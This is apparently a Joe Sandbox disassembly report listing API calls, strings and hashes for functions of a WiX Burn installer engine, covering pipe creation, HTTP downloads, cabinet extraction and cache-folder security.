String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
API String ID: 3302596199-4113288589
Opcode ID: 45b301732f7e03440df4a8a1b6da2981f8f28029fc46d35cdfb1b7ae2cf86f1b
Instruction ID: fb4351b333fec74f8a43711d052cb5072f0b9dbbd70bfb6684e4348d13fd8751
Opcode Fuzzy Hash: 45b301732f7e03440df4a8a1b6da2981f8f28029fc46d35cdfb1b7ae2cf86f1b
Instruction Fuzzy Hash: 2B41F672D4422AAFDF30AA508C82FDEB674BB05704F4186E5F749F7180DA311E89AB90

Function 00C928E3 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 00C9291A
StringFromGUID2.OLE32(?,?,00000027), ref: 00C9292D

Strings

Failed to convert pipe guid into string., xrefs: 00C929B3
Failed to create pipe guid., xrefs: 00C92983
pipe.cpp, xrefs: 00C92979, 00C929A9
BurnPipe.%s, xrefs: 00C9294B
Failed to allocate pipe secret., xrefs: 00C929D0
Failed to allocate pipe name., xrefs: 00C9295F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CreateFromStringUuid
String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
API String ID: 4041566446-2510341293
Opcode ID: 0fd9e8ed846c27c8e65203b72c1bbc19c45f82b16c8568440398786045a81518
Instruction ID: 691da2c7836850be9eff78bf47c7dce318ef614a672eb13a6d451943ad8a87cc
Opcode Fuzzy Hash: 0fd9e8ed846c27c8e65203b72c1bbc19c45f82b16c8568440398786045a81518
Instruction Fuzzy Hash: F9316B32D4031CBADF11DAE5CC89FDEB7B8AB05711F21412AE809FB151DA749A44DB90

Function 00CB6C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 117networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestW.WININET(84400200,?,00000000,00000000,00000000,00CE60D8,84400200,00000000), ref: 00CB6CDA
GetLastError.KERNEL32(?,?,?,00CB7435,00000000,00000000), ref: 00CB6CE6
HttpAddRequestHeadersW.WININET(00000000,00000000,000000FF,40000000), ref: 00CB6D34
GetLastError.KERNEL32(?,?,?,00CB7435,00000000,00000000), ref: 00CB6D3E
InternetCloseHandle.WININET(00000000), ref: 00CB6D88

Strings

Failed to append query strong to resource from URI., xrefs: 00CB6CBF
Failed to open internet request., xrefs: 00CB6D15
downloadengine.cpp, xrefs: 00CB6D0B, 00CB6D63
Failed to add header to HTTP request., xrefs: 00CB6D6D
Failed to allocate string for resource URI., xrefs: 00CB6C93

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorHttpLastRequest$CloseHandleHeadersInternetOpen
String ID: Failed to add header to HTTP request.$Failed to allocate string for resource URI.$Failed to append query strong to resource from URI.$Failed to open internet request.$downloadengine.cpp
API String ID: 3883690129-2273796897
Opcode ID: 90ad5ff4343eee0ebecd2ac47758437338eb60f15e0808fb47ff3831f8aa8469
Instruction ID: 33ddf182ca67fbbb94f3ed8772b84397cb6cf203ff5a7137602bf9c91441368b
Opcode Fuzzy Hash: 90ad5ff4343eee0ebecd2ac47758437338eb60f15e0808fb47ff3831f8aa8469
Instruction Fuzzy Hash: 06310571781218FFDB215EE1DD89EAE7A78EB04B51F200139F522E2191E6788E40A7A0

Function 00CA665B Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00C91E12,?), ref: 00CA667D
GetLastError.KERNEL32(?,?,?,00C91E12,?), ref: 00CA668A
CreateThread.KERNEL32(00000000,00000000,00CA6459,?,00000000,00000000), ref: 00CA66E2
GetLastError.KERNEL32(?,?,?,00C91E12,?), ref: 00CA66EF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,00C91E12,?), ref: 00CA6733
CloseHandle.KERNEL32(00000001,?,?,?,00C91E12,?), ref: 00CA6747
CloseHandle.KERNEL32(?,?,?,?,00C91E12,?), ref: 00CA6754

Strings

Failed to create modal event., xrefs: 00CA66B6
Failed to create UI thread., xrefs: 00CA671B
splashscreen.cpp, xrefs: 00CA66AC, 00CA6711

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
API String ID: 2351989216-1977201954
Opcode ID: 7a0fb9159a773b895ec5bf340a6057f047fd814d38749ef8e3fe55bf1cd3d7de
Instruction ID: 993646bf981c4979ce01cc8899865276d75206e7a1ac0a3ea48639fa5443032f
Opcode Fuzzy Hash: 7a0fb9159a773b895ec5bf340a6057f047fd814d38749ef8e3fe55bf1cd3d7de
Instruction Fuzzy Hash: 9131E472D5061AFED7119BA8CC49EAFBBB4EB85714F24412AF925F6150E7348E008BA0

Function 00C99545 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9956B
GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 00C99586
GetLastError.KERNEL32 ref: 00C99590
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C995CF
GetLastError.KERNEL32 ref: 00C995D9

Strings

Failed to backslash terminate system folder., xrefs: 00C9962C
Failed to get 64-bit system folder., xrefs: 00C99608
Failed to set system folder variant value., xrefs: 00C99648
variable.cpp, xrefs: 00C995BE, 00C995FE
Failed to get 32-bit system folder., xrefs: 00C995C8

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastSystem$Wow64_memset
String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
API String ID: 3186313095-1590374846
Opcode ID: 07c1a345b2297d1e5a0d141f634292c37528f37e233a4de40158f9d948847a5a
Instruction ID: 9a60f1b4c31cf7cbc276f9c464542355e6be49e16a9557d13f46892a60088201
Opcode Fuzzy Hash: 07c1a345b2297d1e5a0d141f634292c37528f37e233a4de40158f9d948847a5a
Instruction Fuzzy Hash: DF213972E41325A3DB2157ADDC0EFAF2798DF00710F12017DF924EA180EA34DE048A94

Function 00CB61E6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,00C91D72,00000000,000000FF,74DF2F60,00000000,00C91D72,?), ref: 00CB620F
GetLastError.KERNEL32 ref: 00CB6222
GetExitCodeThread.KERNEL32(?,000000FF), ref: 00CB6271
GetLastError.KERNEL32 ref: 00CB627F
ResetEvent.KERNEL32(?), ref: 00CB62BD
GetLastError.KERNEL32 ref: 00CB62C7

Strings

Failed to reset operation complete event., xrefs: 00CB62FB
cabextract.cpp, xrefs: 00CB624C, 00CB62A9, 00CB62F1
Failed to get extraction thread exit code., xrefs: 00CB62B3
Failed to wait for operation complete event., xrefs: 00CB6256

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: fa1e6aeadc140e020736072a2ce86d9164ec34121379a1ba86d2ad20a6ca9d26
Instruction ID: 2c4a7ebfacd6538c7c9778267320327c4a00b88365564036b3a62e2312110e7e
Opcode Fuzzy Hash: fa1e6aeadc140e020736072a2ce86d9164ec34121379a1ba86d2ad20a6ca9d26
Instruction Fuzzy Hash: FD317F72A40205FEEB109FE5CD86B9D7BB4FB04311F20453EE216E61A0D3789F08AB02

Function 00CB60DC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(526A5680,00C9222A,00C91E22,?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12,00000000), ref: 00CB60FD
GetLastError.KERNEL32(?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12,00000000,?,00C91E22,CCBB4868), ref: 00CB6107
WaitForSingleObject.KERNEL32(004005BE,000000FF,?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12,00000000,?), ref: 00CB6147
GetLastError.KERNEL32(?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12,00000000,?,00C91E22,CCBB4868), ref: 00CB6151
CloseHandle.KERNEL32(004005BE,00000000,00C9222A,00C91E22,?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12), ref: 00CB61A3
CloseHandle.KERNEL32(526A5680,00000000,00C9222A,00C91E22,?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12), ref: 00CB61B0
CloseHandle.KERNEL32(CCBD4468,00000000,00C9222A,00C91E22,?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12), ref: 00CB61BD

Strings

Failed to set begin operation event., xrefs: 00CB613B
cabextract.cpp, xrefs: 00CB6131, 00CB617B
Failed to wait for thread to terminate., xrefs: 00CB6185

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle$ErrorLast$EventObjectSingleWait
String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
API String ID: 1206859064-226982402
Opcode ID: c6e7db0ca0dc0b5378516d586b0830a1e0daeac3994da3c9dcdc208efa072923
Instruction ID: 7f8f47a6d8a379bdaa075af44334352bc0c2834008d6f8bd57a069a6124016e4
Opcode Fuzzy Hash: c6e7db0ca0dc0b5378516d586b0830a1e0daeac3994da3c9dcdc208efa072923
Instruction Fuzzy Hash: 37319172A00315EBCB209FA9CD85A9EB7F8BF04310F244A3DE256E3591D778EE449B04

Function 00C99667 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9968E
_memset.LIBCMT ref: 00C9969D
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00C996B2
GetLastError.KERNEL32 ref: 00C996BC
GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00C99701
GetLastError.KERNEL32 ref: 00C9970B

Strings

Failed to get windows directory., xrefs: 00C996EB
Failed to set variant value., xrefs: 00C99756
Failed to get volume path name., xrefs: 00C9973A
variable.cpp, xrefs: 00C996E1, 00C99730

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast_memset$DirectoryNamePathVolumeWindows
String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
API String ID: 2690897267-4026719079
Opcode ID: 5de70447e527856608558543e943a6da7924e62c9743046295b30452463cfa52
Instruction ID: 2ea6156ecf050a761b1c3c350f99b56a075d5ba19eee9846b2a47eb603af4f4f
Opcode Fuzzy Hash: 5de70447e527856608558543e943a6da7924e62c9743046295b30452463cfa52
Instruction Fuzzy Hash: F521EAB2A50229A6D720AAA8DC4AFDF776CDF40710F15007DFD14FB181EA34DE449AA5

Function 00C98F71 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC309E: _memset.LIBCMT ref: 00CC30C5
Part of subcall function 00CC309E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00CC30DA
Part of subcall function 00CC309E: LoadLibraryW.KERNELBASE(?,?,00000104,00C91C3B), ref: 00CC3128
Part of subcall function 00CC309E: GetLastError.KERNEL32 ref: 00CC3134

GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00C98F9F
GetLastError.KERNEL32 ref: 00C98FAC
_memset.LIBCMT ref: 00C98FEA
FreeLibrary.KERNEL32(00000000), ref: 00C9901D

Strings

Failed to load ntdll.dll, xrefs: 00C98F8F
Failed to get OS version from RtlGetVersion, xrefs: 00C99005
ntdll.dll, xrefs: 00C98F7F
Failed to get RtlGetVersion entry point, xrefs: 00C98FDB
RtlGetVersion, xrefs: 00C98F97
variable.cpp, xrefs: 00C98FD1

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastLibrary_memset$AddressDirectoryFreeLoadProcSystem
String ID: Failed to get OS version from RtlGetVersion$Failed to get RtlGetVersion entry point$Failed to load ntdll.dll$RtlGetVersion$ntdll.dll$variable.cpp
API String ID: 1538852321-2659798697
Opcode ID: 41bfea9b9588ceb3ebcd95bde4bfadeb380b3cab1d8678a590726f7c7c3cbc39
Instruction ID: 99584d7df4eb6bccab347c3e3a0aeeab5ed8802858cb58251528ebe564ca7760
Opcode Fuzzy Hash: 41bfea9b9588ceb3ebcd95bde4bfadeb380b3cab1d8678a590726f7c7c3cbc39
Instruction Fuzzy Hash: 77117371780306BBEB105AD9DC8FF6E7AA89B15715F201039FA01E6191FBB5DA04AA14

Function 00CA4057 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 279COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00C91317,00C9171F,00C91333,00C91703,?,00C9139F,00C9171F,00C915D7,00C913CF), ref: 00CA40CC

Strings

Failed to check for remaining dependents during planning., xrefs: 00CA4260
Failed to create the string dictionary., xrefs: 00CA410A
Failed to allocate registration action., xrefs: 00CA413B
Failed to add dependent bundle provider key to ignore dependents., xrefs: 00CA421E
Failed to add registration action for self dependent., xrefs: 00CA4366
Failed to add self-dependent to ignore dependents., xrefs: 00CA4154
Failed to add dependents ignored from command-line., xrefs: 00CA4184
Failed to add registration action for dependent related bundle., xrefs: 00CA439C

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.
API String ID: 1825529933-2086987450
Opcode ID: 4857db0dbbd5585775381b4277b0a01edb9d1ae948cf3e031086c059e59cdc75
Instruction ID: 6bffecff3e10d00577262a75259826ab0651833bc7e83d652c26109846f98982
Opcode Fuzzy Hash: 4857db0dbbd5585775381b4277b0a01edb9d1ae948cf3e031086c059e59cdc75
Instruction Fuzzy Hash: CAB1607190130BEFCF28DFA4C881A9DB7B1BF56309F10453AFA25A6151D3B19A90EF91

Function 00CC212A Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000040,00000000,00000000,00000000), ref: 00CC2171
GetLastError.KERNEL32 ref: 00CC2177
ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CC21C6
GetLastError.KERNEL32 ref: 00CC21CC
GetFullPathNameW.KERNEL32(00000000,00000040,00000000,00000000,00000000,00000040,00000000,00000000,00000000), ref: 00CC228D
GetLastError.KERNEL32 ref: 00CC2293
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CC22E9
GetLastError.KERNEL32 ref: 00CC22EF

Strings

pathutil.cpp, xrefs: 00CC2325

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: pathutil.cpp
API String ID: 1547313835-741606033
Opcode ID: eaf1d70b7c45b9d59b95741ff9ba746f64784ae345733927a9ca3478b2b4ffa5
Instruction ID: e95fc2806206c0d6c7eac020cb9d1968333474e0d9cc434bd91d45a75a0ba17d
Opcode Fuzzy Hash: eaf1d70b7c45b9d59b95741ff9ba746f64784ae345733927a9ca3478b2b4ffa5
Instruction Fuzzy Hash: 06619872D0026AEBDB219AD5CC45F9E7BACAF04760F194579E910F7160E339DF409B90

Function 00CB227A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 126COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,000000FE,?,00000000,?,?,?,?,?), ref: 00CB2304
GetLastError.KERNEL32(?,?,?,?,?), ref: 00CB230E
CopyFileExW.KERNEL32(?,?,00CB1A9D,?,?,00000000,?,00000000,?,?,?,?,?,00000000,00000000), ref: 00CB2365
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,?,?,00CB2760,?,00000000,?,00000000,00000001,00000000), ref: 00CB2398

Strings

copy, xrefs: 00CB22D2
BA aborted copy of payload from: '%ls' to: %ls., xrefs: 00CB2390
apply.cpp, xrefs: 00CB2333, 00CB237E, 00CB23BD
Failed to clear readonly bit on payload destination path: %ls, xrefs: 00CB2340
Failed attempt to copy payload from: '%ls' to: %ls., xrefs: 00CB23CD

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$AttributesCopy
String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
API String ID: 1969131206-836986073
Opcode ID: 688e8bc5dd69d7167921c4cace1d459ac2b40c9c399e39b71fa480e57dac13ed
Instruction ID: 2db357b3d41cdb8ca248f2b93534fe7e0b25ddb84d73389aed142dd74c9319aa
Opcode Fuzzy Hash: 688e8bc5dd69d7167921c4cace1d459ac2b40c9c399e39b71fa480e57dac13ed
Instruction Fuzzy Hash: 6E412672740306BBEB105EA1CC46FAB3BADAF54710F14803DF615D62A0D778DE00A751

Function 00CB6E84 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 108fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,000000FF,?,00000000,?,?,?,00CB7988,?), ref: 00CB6ED4
GetLastError.KERNEL32(?,?,?,00CB7988,?,?,000000FF,?,000000FF,00000000,?,00000001,?,?,WiX\Burn,DownloadTimeout), ref: 00CB6EE2
ReadFile.KERNEL32(00000000,00000008,00000008,00000000,00000000,?,?,?,00CB7988,?,?,000000FF,?,000000FF,00000000,?), ref: 00CB6F37
CloseHandle.KERNEL32(000000FF,000000FF), ref: 00CB6F6D
GetLastError.KERNEL32(?,?,?,00CB7988,?,?,000000FF,?,000000FF,00000000,?,00000001,?,?,WiX\Burn,DownloadTimeout), ref: 00CB6F7C

Strings

Failed to read resume file: %ls, xrefs: 00CB6FB5
downloadengine.cpp, xrefs: 00CB6F0C, 00CB6FA6
Failed to calculate resume path from working path: %ls, xrefs: 00CB6EAC
Failed to create resume file: %ls, xrefs: 00CB6F1B

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleRead
String ID: Failed to calculate resume path from working path: %ls$Failed to create resume file: %ls$Failed to read resume file: %ls$downloadengine.cpp
API String ID: 3160720760-919322122
Opcode ID: 498cdf680c6f94b5ae9262d07604645eaeb7f5fde1b694d09f9284dca1e8a1e0
Instruction ID: 68e93ce9724998651736bfd1125896023354d2558e9d3b2f765545776e59fbdc
Opcode Fuzzy Hash: 498cdf680c6f94b5ae9262d07604645eaeb7f5fde1b694d09f9284dca1e8a1e0
Instruction Fuzzy Hash: 994149B1A00209FFDB109FE4DC86BAD7B75EF05310F208529F629EA1A0D3759A41AB10

Function 00C98C84 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 00C98C97
_wcscspn.LIBCMT ref: 00C98CC7

Strings

Failed to append escape sequence., xrefs: 00C98D4B
[\%c], xrefs: 00C98CF6
[]{}, xrefs: 00C98CC1
Failed to append characters., xrefs: 00C98D23
Failed to allocate buffer for escaped string., xrefs: 00C98CAE
Failed to copy string., xrefs: 00C98D3D
Failed to format escape sequence., xrefs: 00C98D44

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _wcscspnlstrlen
String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
API String ID: 2089742776-3250950999
Opcode ID: 6ab2bc12c5002a7c9d1d33ed7e45bb39e03e400e8512a1a7bb34c72d02d47362
Instruction ID: 319c8abff55f1b69f8a52e191f32bdac51804f692144138dced354e2c85dbe15
Opcode Fuzzy Hash: 6ab2bc12c5002a7c9d1d33ed7e45bb39e03e400e8512a1a7bb34c72d02d47362
Instruction Fuzzy Hash: 2D21E63394121AFBDF116694CC4AFAE77A8DB12710F34016BFA01B71D1DF70AE48A2A1

Function 00CC62C4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?,00CE1FAC,00000208,00000000,?,00CBFE15,?,?,?), ref: 00CC62DF
GetLastError.KERNEL32(?,?,00CE1FAC,00000208,00000000,?,00CBFE15,?,?,?), ref: 00CC62F5
GlobalAlloc.KERNEL32(00000000,?,?,?,00CE1FAC,00000208,00000000,?,00CBFE15,?,?,?), ref: 00CC6323
GetFileVersionInfoW.VERSION(?,?,?,00000000,?,00CBFE15,?,?,?), ref: 00CC6347
GetLastError.KERNEL32(?,?,?,00000000,?,00CBFE15,?,?,?), ref: 00CC6350
VerQueryValueW.VERSION(00CBFE15,00CE238C,?,?,?,?,?,00000000,?,00CBFE15,?,?,?), ref: 00CC637C
